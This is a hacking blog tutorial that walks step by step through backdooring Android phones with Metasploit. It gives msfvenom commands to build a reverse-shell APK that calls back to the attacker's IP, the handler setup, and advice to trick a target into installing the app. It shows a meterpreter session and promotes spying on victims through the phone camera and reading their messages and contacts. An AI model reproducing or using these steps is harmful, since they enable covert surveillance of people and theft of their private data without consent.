How to hack an android phone – metasploit

Android is the most popular mobile platform and its users are increasing day by day, and security threat too. Android phones are vulnerable and can be easily backdoored. Metasploit is the best tool in kali linux which can generate and handle a payload. Metasploit have more than 1000 exploits which is more than enough. Now we are using metasploit to hack android. We will create a backdoor package using msfvenom. Executing the apk on target device will give you a reverse meterpreter shell.


Demo video




1. Metasploit framework


Its pre-installed in kali. If you dont find it download and install by the following command


# apt-get install metasploit-framework


Generating Payload (.apk)

Normally we use msfpayload command to generate payload, since kali 2.0 msfvenom is used over msfpayload.

# msfvenom -p android/meterpreter/reverse_tcp –platform android LHOST= “attacker IP” LPORT=444 -o /root/Desktop/payload.apk


An apk will be generated in the desktop. Attacker ip can be your local IP, but if the target is on WAN (anywhere on internet) provide your external ip and forward port 444 of your router.
Want to know how how android is hacked over dynamic DNS via wan, follow this thread on askthehackers.com – https://www.askthehackers.com/20/how-to-inject-an-apk-file-into-another-device-remotely
# msfvenom -p android/meterpreter/reverse_tcp –platform android LHOST= LPORT=444 -o /root/Desktop/payload.apk
No Arch selected, selecting Arch: dalvik from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 8496 bytes
Saved as: /root/Desktop/payload.apk


Setting up reverse handler

Now start msf reverse handler on your kali machine. Fire up metasploit

# msfconsole

Wait for a minitue, msfconsole will come up. Use handler then, set payload and option.

1. Handler

msf> use multi/handler

2. set payload

msf exploit(handler) > set PAYLOAD android/meterpreter/reverse_tcp

3. Set local port

msf exploit(handler) > set LPORT 444

4. Set local host

msf exploit(handler) > set LHOST “attacker ip”

5. exploit

msf exploit(handler) > exploit

Wait for the target to connect back

msf exploit(handler) > exploit
[*] Started reverse handler on
[*] Starting the payload handler…


Executing the payload on Target

To make a reverse connection you have to execute the payload on target device. If you have direct access to the target device, copy the apk that you have created and install it. Else upload it to some server and give the link and make him install the apk.

Now come back to our handler. If the target has executed it, a meterpreter shell will be spawned. Now you are the owner of the system!

[*] Started reverse handler on
[*] Starting the payload handler…
[*] Sending stage (56173 bytes) to
[*] Meterpreter session 1 opened ( -> at 2015-12-08 04:50:59 -0500
meterpreter >

Now you can read messages, contacts, call log, Access camera and mic, upload and download files

help command for more options

meterpreter > help

The most interesting part which i like is spying the camera.


meterpreter > webcam_stream

By this command you can have a live stream on the main camera. Even though the frame rate is low you can spy them like a James bond movie. You can also spy on front camera or the secondary camera by the command


meterpreter > webcam_stream 2

Happy hacking !

 Any doubts or questions? Ask it on our new hackers Q and A forum askthehackers.com
Ask a Question

susmith HCK

susmith HCK Author

I’m a computer enthusiast basically and i love to write blogs on tech issues and cyber security. I started penetration testing at the age of 16 and i would like to explore security vulnerabilities and latest tech news and wanna share with you. If you like all these stuffs add me on Facebook and Google plus.